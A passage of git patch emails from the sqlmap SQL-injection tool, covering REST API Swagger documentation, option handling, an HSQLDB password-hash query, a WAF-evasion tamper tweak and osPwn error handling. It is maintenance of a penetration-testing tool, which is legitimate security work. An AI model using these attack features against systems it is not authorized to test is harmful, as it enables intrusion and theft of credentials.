"adminFlush" + produces: + - "application/json" + responses: + 200: + description: "Task pool successfully flushed" + schema: + type: object + properties: + success: + type: boolean + enum: [true] + /admin/{token}/flush: + get: + tags: + - "admin" + summary: "Flush task pool (remotely)" + description: "Note: Use in cases when connecting to server from different IP" + operationId: "adminFlushToken" + produces: + - "application/json" + parameters: + - name: "token" + in: "path" + description: "Secret token (Note: written to console during a server run - e.g. `2756d5b6e7d093ba49b5fd06a93aca7a`)" + required: true + type: "string" + responses: + 200: + description: "Task pool successfully flushed" + schema: + type: object + properties: + success: + type: boolean + enum: [true] +externalDocs: + description: "Find out more about sqlmap API (REST-JSON)" + url: "https://github.com/sqlmapproject/sqlmap/wiki/Usage#api-rest-json" \ No newline at end of file diff --git a/txt/checksum.md5 b/txt/checksum.md5 index b0fee54978e..3ee88a07c12 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -2ec7d2bc8a0e0c387488c41c0cd44f51 lib/core/settings.py +f6c316b9de14838f5a70072e514c5974 lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 721198b5be72c8015a02acb116532a1f lib/core/target.py @@ -101,7 +101,7 @@ db208ab47de010836c6bf044e2357861 lib/techniques/blind/inference.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/union/__init__.py f7813cdee00df8f98d6f811475e520a1 lib/techniques/union/test.py 7361338240ecd9d01d1d10ec76bce069 lib/techniques/union/use.py -77ff35587af9e3dfde63b8327e230f9a lib/utils/api.py +dfea8e2ca23c5160b2f57732d8d49023 lib/utils/api.py 37dfb641358669f62c2acedff241348b lib/utils/brute.py 31b1e7eb489eac837db6a2bc1dcb7da7 lib/utils/crawler.py f9867bbfcd6d31916ca73e72e95fd881 lib/utils/deps.py From f2af8861f92943daebdf53c73860bd281048b419 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 15 Nov 2018 17:13:13 +0100 Subject: [PATCH 360/428] Some more updates regarding #3140 --- lib/core/settings.py | 2 +- lib/utils/api.py | 27 +++-- swagger.yaml | 274 ++++++++++++++++++++++++++++++++++++++++++- txt/checksum.md5 | 4 +- 4 files changed, 292 insertions(+), 15 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index f40b3687282..3d58735a129 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.11.8" +VERSION = "1.2.11.9" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/utils/api.py b/lib/utils/api.py index 7a7229ca579..05f39e879e7 100644 --- a/lib/utils/api.py +++ b/lib/utils/api.py @@ -437,25 +437,30 @@ def option_list(taskid): @post("/option//get") def option_get(taskid): """ - Get the value of an option (command line switch) for a certain task ID + Get value of option(s) for a certain task ID """ if taskid not in DataStore.tasks: logger.warning("[%s] Invalid task ID provided to option_get()" % taskid) return jsonize({"success": False, "message": "Invalid task ID"}) - option = request.json.get("option", "") + options = request.json or [] + results = {} - if option in DataStore.tasks[taskid].options: - logger.debug("[%s] Retrieved value for option %s" % (taskid, option)) - return jsonize({"success": True, option: DataStore.tasks[taskid].get_option(option)}) - else: - logger.debug("[%s] Requested value for unknown option %s" % (taskid, option)) - return jsonize({"success": False, "message": "Unknown option", option: "not set"}) + for option in options: + if option in DataStore.tasks[taskid].options: + results[option] = DataStore.tasks[taskid].options[option] + else: + logger.debug("[%s] Requested value for unknown option '%s'" % (taskid, option)) + return jsonize({"success": False, "message": "Unknown option '%s'" % option}) + + logger.debug("[%s] Retrieved values for option(s) '%s'" % (taskid, ",".join(options))) + + return jsonize({"success": True, "options": results}) @post("/option//set") def option_set(taskid): """ - Set an option (command line switch) for a certain task ID + Set value of option(s) for a certain task ID """ if taskid not in DataStore.tasks: @@ -775,11 +780,11 @@ def client(host=RESTAPI_DEFAULT_ADDRESS, port=RESTAPI_DEFAULT_PORT, username=Non logger.error("No task ID in use") continue try: - command, option = command.split(" ") + command, option = command.split(" ", 1) except ValueError: raw = _client("%s/option/%s/list" % (addr, taskid)) else: - options = {"option": option} + options = re.split(r"\s*,\s*", option.strip()) raw = _client("%s/option/%s/get" % (addr, taskid), options) res = dejsonize(raw) if not res["success"]: diff --git a/swagger.yaml b/swagger.yaml index 3f00bf4d8cd..6269bba0b2a 100644 --- a/swagger.yaml +++ b/swagger.yaml @@ -1,8 +1,9 @@ +# Note: written with Swagger Editor (https://editor.swagger.io/) swagger: "2.0" info: description: "" version: "1.2" - title: "sqlmap API (REST-JSON)" + title: "sqlmap API" contact: email: "dev@sqlmap.org" license: @@ -183,6 +184,277 @@ paths: success: type: boolean enum: [true] + /option/{taskid}/list: + get: + tags: + - "option" + summary: "List task options" + description: "" + operationId: "optionList" + produces: + - "application/json" + parameters: + - name: "taskid" + in: "path" + description: "ID of an existing task to list it's options" + required: true + type: "string" + responses: + 200: + description: "Task options successfully listed" + schema: + type: object + properties: + success: + type: boolean + enum: [true] + options: + type: object + additionalProperties: + type: string + example: + crawlDepth: null + osShell: false + getUsers: false + getPasswordHashes: false + excludeSysDbs: false + ignoreTimeouts: false + regData: null + fileDest: null + prefix: null + code: null + googlePage: 1 + skip: null + query: null + randomAgent: false + osPwn: false + authType: null + safeUrl: null + requestFile: null + predictOutput: false + wizard: false + stopFail: false + forms: false + uChar: null + secondReq: null + taskid: d977b0e5f091370e + pivotColumn: null + dropSetCookie: false + smart: false + paramExclude: null + risk: 1 + sqlFile: null + rParam: null + getCurrentUser: false + notString: null + getRoles: false + getPrivileges: false + testParameter: null + tbl: null + charset: null + trafficFile: null + osSmb: false + level: 1 + dnsDomain: null + outputDir: null + encoding: null + skipWaf: false + timeout: 30 + firstChar: null + torPort: null + getComments: false + binaryFields: null + checkTor: false + commonTables: false + direct: null + tmpPath: null + titles: false + getSchema: false + identifyWaf: false + paramDel: null + safeReqFile: null + regKey: null + murphyRate: null + limitStart: null + crawlExclude: null + flushSession: false + loadCookies: null + csvDel: + offline: false + method: null + tmpDir: null + fileWrite: null + disablePrecon: false + osBof: false + testSkip: null + invalidLogical: false + getCurrentDb: false + hexConvert: false + proxyFile: null + answers: null + host: null + dependencies: false + cookie: null + proxy: null + regType: null + optimize: false + limitStop: null + search: false + uFrom: null + noCast: false + testFilter: null + ignoreCode: null + eta: false + csrfToken: null + threads: 1 + logFile: null + os: null + col: null + skipStatic: false + proxyCred: null + verbose: 1 + isDba: false + updateAll: false + privEsc: false + forceDns: false + getAll: false + api: true + url: http://www.test.com/index.php?id=1 + invalidBignum: false + regexp: null + getDbs: false + freshQueries: false + uCols: null + smokeTest: false + udfInject: false + invalidString: false + tor: false + forceSSL: false + beep: false + noEscape: false + configFile: null + scope: null + authFile: null + torType: SOCKS5 + regVal: null + dummy: false + checkInternet: false + safePost: null + safeFreq: null + skipUrlEncode: false + referer: null + liveTest: false + retries: 3 + extensiveFp: false + dumpTable: false + getColumns: false + batch: true + purge: false + headers: null + authCred: null + osCmd: null + suffix: null + dbmsCred: null + regDel: false + shLib: null + sitemapUrl: null + timeSec: 5 + msfPath: null + dumpAll: false + fileRead: null + getHostname: false + sessionFile: null + disableColoring: true + getTables: false + listTampers: false + agent: null + webRoot: null + exclude: null + lastChar: null + string: null + dbms: null + dumpWhere: null + tamper: null + ignoreRedirects: false + hpp: false + runCase: null + delay: 0 + evalCode: null + cleanup: false + csrfUrl: null + secondUrl: null + getBanner: true + profile: false + regRead: false + bulkFile: null + db: null + dumpFormat: CSV + alert: null + harFile: null + nullConnection: false + user: null + parseErrors: false + getCount: false + data: null + regAdd: false + ignoreProxy: false + database: /tmp/sqlmapipc-jGw6ZY + mobile: false + googleDork: null + saveConfig: null + sqlShell: false + tech: BEUSTQ + textOnly: false + cookieDel: null + commonColumns: false + keepAlive: false + /option/{taskid}/get: + post: + tags: + - "option" + summary: "Get task option value(s)" + description: "" + operationId: "optionGet" + consumes: + - "application/json" + produces: + - "application/json" + parameters: + - name: "taskid" + in: "path" + description: "ID of an existing task" + required: true + type: "string" + - in: body + name: options + description: "" + schema: + type: array + items: + type: string + example: ["url", "timeout"] + responses: + 200: + description: "Task option value successfully retrieved" + schema: + type: object + properties: + success: + type: boolean + options: + type: array + items: + type: object + properties: + name: + type: string + value: + type: string + example: + - success: true + options: + url: http://www.test.com/index.php?id=1 + timeout: 30 externalDocs: description: "Find out more about sqlmap API (REST-JSON)" url: "https://github.com/sqlmapproject/sqlmap/wiki/Usage#api-rest-json" \ No newline at end of file diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 3ee88a07c12..611de95fe29 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -f6c316b9de14838f5a70072e514c5974 lib/core/settings.py +b7d7300f745050d9a29bcf30a1ddcc5e lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 721198b5be72c8015a02acb116532a1f lib/core/target.py @@ -101,7 +101,7 @@ db208ab47de010836c6bf044e2357861 lib/techniques/blind/inference.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/union/__init__.py f7813cdee00df8f98d6f811475e520a1 lib/techniques/union/test.py 7361338240ecd9d01d1d10ec76bce069 lib/techniques/union/use.py -dfea8e2ca23c5160b2f57732d8d49023 lib/utils/api.py +038ec99105c59acc2b1c6cb90e9e4043 lib/utils/api.py 37dfb641358669f62c2acedff241348b lib/utils/brute.py 31b1e7eb489eac837db6a2bc1dcb7da7 lib/utils/crawler.py f9867bbfcd6d31916ca73e72e95fd881 lib/utils/deps.py From e11febdcbc05033557872fd0a235f99c30d95ecc Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 19 Nov 2018 09:44:13 +0100 Subject: [PATCH 361/428] Fixes #3375 --- lib/core/settings.py | 2 +- plugins/generic/users.py | 2 ++ txt/checksum.md5 | 4 ++-- 3 files changed, 5 insertions(+), 3 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 3d58735a129..e19f030d825 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.11.9" +VERSION = "1.2.11.10" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/plugins/generic/users.py b/plugins/generic/users.py index e2cec9763ca..742a8ec5c66 100644 --- a/plugins/generic/users.py +++ b/plugins/generic/users.py @@ -285,6 +285,8 @@ def getPasswordHashes(self): query = rootQuery.blind.query % (user, index, user) elif Backend.isDbms(DBMS.INFORMIX): query = rootQuery.blind.query % (user,) + elif Backend.isDbms(DBMS.HSQLDB): + query = rootQuery.blind.query % (index, user) else: query = rootQuery.blind.query % (user, index) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 611de95fe29..98069ec648a 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -b7d7300f745050d9a29bcf30a1ddcc5e lib/core/settings.py +ffa07ffe5349c0a8d8cff5de53e3211d lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 721198b5be72c8015a02acb116532a1f lib/core/target.py @@ -223,7 +223,7 @@ f7874230e5661910d5fd21544c7d1022 plugins/generic/misc.py 30b421f06dc98998ddc1923a9048b7fc plugins/generic/search.py a70cc0ada4b0cc9e7df23cb6d48a4a0c plugins/generic/syntax.py a37c21cc3fa5c0c220d33d450bf503ed plugins/generic/takeover.py -e762c77ff79e4c138145501f6fbb10cb plugins/generic/users.py +1265241e309da72bb82c3863a4c1b4bd plugins/generic/users.py 1e5532ede194ac9c083891c2f02bca93 plugins/__init__.py 5dc693e22f5d020c5c568d7325bd4226 shell/backdoors/backdoor.asp_ 158bfa168128393dde8d6ed11fe9a1b8 shell/backdoors/backdoor.aspx_ From dc5edf1a86186da22a93abfa8b4a2c7cd321bc89 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 19 Nov 2018 09:52:09 +0100 Subject: [PATCH 362/428] Patch regarding #3377 --- lib/core/settings.py | 2 +- tamper/randomcase.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index e19f030d825..109bb737e29 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.11.10" +VERSION = "1.2.11.11" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/tamper/randomcase.py b/tamper/randomcase.py index 9d2843154e3..988dd3c8446 100644 --- a/tamper/randomcase.py +++ b/tamper/randomcase.py @@ -43,7 +43,7 @@ def tamper(payload, **kwargs): for match in re.finditer(r"\b[A-Za-z_]+\b", retVal): word = match.group() - if word.upper() in kb.keywords: + if word.upper() in kb.keywords or ("%s(" % word) in payload: while True: _ = "" diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 98069ec648a..d821f594300 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -ffa07ffe5349c0a8d8cff5de53e3211d lib/core/settings.py +93eef5a012b79983815748224f41364f lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 721198b5be72c8015a02acb116532a1f lib/core/target.py @@ -270,7 +270,7 @@ a3a3cef042b864c4226b63f89548f939 tamper/overlongutf8.py 89f8753a0ef65d2bb860c8864e9e935a tamper/percentage.py a47aafcbc1de2deb85160e29de46f748 tamper/plus2concat.py 759b86cf3bb1d7871dc6489538253f94 tamper/plus2fnconcat.py -078494e1217400b485ef653108d32699 tamper/randomcase.py +6522603955388256aee014334ebea22b tamper/randomcase.py 28626e4b8c673228dcfe4f1627a9e08b tamper/randomcomments.py cac8a56f8cc6c14524ee392daa5ae2fd tamper/space2comment.py 4e6da2aca962b6110652e5f83dce5cd7 tamper/space2dash.py From abb911d7412411fe265fcae298524af1b7023649 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 19 Nov 2018 09:53:09 +0100 Subject: [PATCH 363/428] Just for the sake of #3377 --- lib/core/settings.py | 2 +- tamper/randomcase.py | 1 + txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 3 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 109bb737e29..f711a06a366 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.11.11" +VERSION = "1.2.11.12" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/tamper/randomcase.py b/tamper/randomcase.py index 988dd3c8446..3a01b216ef9 100644 --- a/tamper/randomcase.py +++ b/tamper/randomcase.py @@ -25,6 +25,7 @@ def tamper(payload, **kwargs): * MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 + * SQLite 3 Notes: * Useful to bypass very weak and bespoke web application firewalls diff --git a/txt/checksum.md5 b/txt/checksum.md5 index d821f594300..c830eaaabc9 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -93eef5a012b79983815748224f41364f lib/core/settings.py +a30083ca6c21379bc31b931dca5b3464 lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 721198b5be72c8015a02acb116532a1f lib/core/target.py @@ -270,7 +270,7 @@ a3a3cef042b864c4226b63f89548f939 tamper/overlongutf8.py 89f8753a0ef65d2bb860c8864e9e935a tamper/percentage.py a47aafcbc1de2deb85160e29de46f748 tamper/plus2concat.py 759b86cf3bb1d7871dc6489538253f94 tamper/plus2fnconcat.py -6522603955388256aee014334ebea22b tamper/randomcase.py +b9db4cc9fc4e0a586198340d1268fdaf tamper/randomcase.py 28626e4b8c673228dcfe4f1627a9e08b tamper/randomcomments.py cac8a56f8cc6c14524ee392daa5ae2fd tamper/space2comment.py 4e6da2aca962b6110652e5f83dce5cd7 tamper/space2dash.py From 3f1bf742fc513f40946621a83a5d818c1b57b046 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 22 Nov 2018 08:07:27 +0100 Subject: [PATCH 364/428] Fixes #3379 --- lib/core/settings.py | 5 ++++- lib/request/connect.py | 3 +++ txt/checksum.md5 | 4 ++-- 3 files changed, 9 insertions(+), 3 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index f711a06a366..42e501548b9 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.11.12" +VERSION = "1.2.11.14" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) @@ -174,6 +174,9 @@ # Minimum time response set needed for time-comparison based on standard deviation MIN_TIME_RESPONSES = 30 +# Maximum time response set used during time-comparison based on standard deviation +MAX_TIME_RESPONSES = 200 + # Minimum comparison ratio set needed for searching valid union column number based on standard deviation MIN_UNION_RESPONSES = 5 diff --git a/lib/request/connect.py b/lib/request/connect.py index 1a6c4e580f7..c3526fd3f06 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -99,6 +99,7 @@ class WebSocketException(Exception): from lib.core.settings import MAX_MURPHY_SLEEP_TIME from lib.core.settings import META_REFRESH_REGEX from lib.core.settings import MIN_TIME_RESPONSES +from lib.core.settings import MAX_TIME_RESPONSES from lib.core.settings import IDS_WAF_CHECK_PAYLOAD from lib.core.settings import IS_WIN from lib.core.settings import LARGE_CHUNK_TRIM_MARKER @@ -1293,6 +1294,8 @@ def _(value): elif noteResponseTime: kb.responseTimes.setdefault(kb.responseTimeMode, []) kb.responseTimes[kb.responseTimeMode].append(threadData.lastQueryDuration) + if len(kb.responseTimes) > MAX_TIME_RESPONSES: + kb.responseTimes = kb.responseTimes[-MAX_TIME_RESPONSES:] if not response and removeReflection: page = removeReflectiveValues(page, payload) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index c830eaaabc9..7fb23fc1265 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -a30083ca6c21379bc31b931dca5b3464 lib/core/settings.py +668bbf57ac4603b3adf6308646c719dc lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 721198b5be72c8015a02acb116532a1f lib/core/target.py @@ -71,7 +71,7 @@ f6b5957bf2103c3999891e4f45180bce lib/parse/payloads.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py 2b81435f5a7519298c15c724e3194a0d lib/request/basic.py 859b6ad583e0ffba154f17ee179b5b89 lib/request/comparison.py -9bfc067165e82afc0b271f777850ad30 lib/request/connect.py +d21e3452240ae3e59dfeb05fabc9ea14 lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py 98535d0efca5551e712fcc4b34a3f772 lib/request/httpshandler.py From 037db0f4a08e880ebf604682e018da6fae4d2226 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 23 Nov 2018 15:55:05 +0100 Subject: [PATCH 365/428] Fixes #3381 --- lib/core/settings.py | 2 +- plugins/generic/takeover.py | 16 +++++++++++----- txt/checksum.md5 | 4 ++-- 3 files changed, 14 insertions(+), 8 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 42e501548b9..57b2ff4346a 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.11.14" +VERSION = "1.2.11.15" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/plugins/generic/takeover.py b/plugins/generic/takeover.py index 88a261040fa..cf721cdae29 100644 --- a/plugins/generic/takeover.py +++ b/plugins/generic/takeover.py @@ -8,6 +8,7 @@ import os from lib.core.common import Backend +from lib.core.common import getSafeExString from lib.core.common import isStackingAvailable from lib.core.common import readInput from lib.core.common import runningAsAdmin @@ -20,6 +21,7 @@ from lib.core.exception import SqlmapMissingMandatoryOptionException from lib.core.exception import SqlmapMissingPrivileges from lib.core.exception import SqlmapNotVulnerableException +from lib.core.exception import SqlmapSystemException from lib.core.exception import SqlmapUndefinedMethod from lib.core.exception import SqlmapUnsupportedDBMSException from lib.takeover.abstraction import Abstraction @@ -132,12 +134,16 @@ def osPwn(self): errMsg += "http://code.google.com/p/impacket/downloads/list" raise SqlmapMissingDependence(errMsg) - sysIgnoreIcmp = "/proc/sys/net/ipv4/icmp_echo_ignore_all" + filename = "/proc/sys/net/ipv4/icmp_echo_ignore_all" - if os.path.exists(sysIgnoreIcmp): - fp = open(sysIgnoreIcmp, "wb") - fp.write("1") - fp.close() + if os.path.exists(filename): + try: + with open(filename, "wb") as f: + f.write("1") + except IOError, ex: + errMsg = "there has been a file opening/writing error " + errMsg += "for filename '%s' ('%s')" % (filename, getSafeExString(ex)) + raise SqlmapSystemException(errMsg) else: errMsg = "you need to disable ICMP replies by your machine " errMsg += "system-wide. For example run on Linux/Unix:\n" diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 7fb23fc1265..ed7e4ad4fbe 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -668bbf57ac4603b3adf6308646c719dc lib/core/settings.py +95c2d218452e270a1a84849448d69110 lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 721198b5be72c8015a02acb116532a1f lib/core/target.py @@ -222,7 +222,7 @@ f5d5419efddfe04648ea5e953c650793 plugins/generic/fingerprint.py f7874230e5661910d5fd21544c7d1022 plugins/generic/misc.py 30b421f06dc98998ddc1923a9048b7fc plugins/generic/search.py a70cc0ada4b0cc9e7df23cb6d48a4a0c plugins/generic/syntax.py -a37c21cc3fa5c0c220d33d450bf503ed plugins/generic/takeover.py +f990d799e578dfbc3cde5728655a7854 plugins/generic/takeover.py 1265241e309da72bb82c3863a4c1b4bd plugins/generic/users.py 1e5532ede194ac9c083891c2f02bca93 plugins/__init__.py 5dc693e22f5d020c5c568d7325bd4226 shell/backdoors/backdoor.asp_ From 277a4fa40232657b7946a2e90ff83a1eaba095de Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 26 Nov 2018 23:40:47 +0100 Subject: [PATCH 366/428] Potential patch for #3167 --- lib/controller/handler.py | 3 ++- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 5 insertions(+), 4 deletions(-) diff --git a/lib/controller/handler.py b/lib/controller/handler.py index bb05e11024b..2ff64ea2a07 100644 --- a/lib/controller/handler.py +++ b/lib/controller/handler.py @@ -125,10 +125,11 @@ def setHandler(): if conf.forceDbms == dbms or handler.checkDbms(): if kb.resolutionDbms: conf.dbmsHandler = max(_ for _ in items if _[0] == kb.resolutionDbms)[2]() + conf.dbmsHandler._dbms = kb.resolutionDbms else: conf.dbmsHandler = handler + conf.dbmsHandler._dbms = dbms - conf.dbmsHandler._dbms = dbms break else: conf.dbmsConnector = None diff --git a/lib/core/settings.py b/lib/core/settings.py index 57b2ff4346a..7f1caee5c37 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.11.15" +VERSION = "1.2.11.16" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index ed7e4ad4fbe..b1cb919bba8 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -25,7 +25,7 @@ c1bccc94522d3425a372dcd57f78418e extra/wafdetectify/wafdetectify.py 3459c562a6abb9b4bdcc36925f751f3e lib/controller/action.py 71334197c7ed28167cd66c17b2c21844 lib/controller/checks.py dd42ef140ffc0bd517128e6df369ab01 lib/controller/controller.py -ba2717a410b21285d781ab42c4a797d0 lib/controller/handler.py +988b548f6578adf9cec17afdeee8291c lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py cb865cf6eff60118bc97a0f106af5e4d lib/core/agent.py c347f085bd561adfa26d3a9512e5f3b9 lib/core/bigarray.py @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -95c2d218452e270a1a84849448d69110 lib/core/settings.py +342e732d0772891804c7609578176997 lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 721198b5be72c8015a02acb116532a1f lib/core/target.py From f1a3c81aecd7680929962e725fa6572683810b54 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 28 Nov 2018 00:29:17 +0100 Subject: [PATCH 367/428] Bug fix for handling of custom headers --- lib/core/option.py | 4 ++-- lib/core/settings.py | 2 +- lib/core/target.py | 6 +++--- lib/request/connect.py | 4 ++-- txt/checksum.md5 | 8 ++++---- 5 files changed, 12 insertions(+), 12 deletions(-) diff --git a/lib/core/option.py b/lib/core/option.py index 1f37b48e9b6..288213acfcc 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -1071,7 +1071,7 @@ def _setSafeVisit(): key, value = line.split(':', 1) value = value.strip() kb.safeReq.headers[key] = value - if key == HTTP_HEADER.HOST: + if key.upper() == HTTP_HEADER.HOST.upper(): if not value.startswith("http"): scheme = "http" if value.endswith(":443"): @@ -1303,7 +1303,7 @@ def _setHTTPUserAgent(): _ = True for header, _ in conf.httpHeaders: - if header == HTTP_HEADER.USER_AGENT: + if header.upper() == 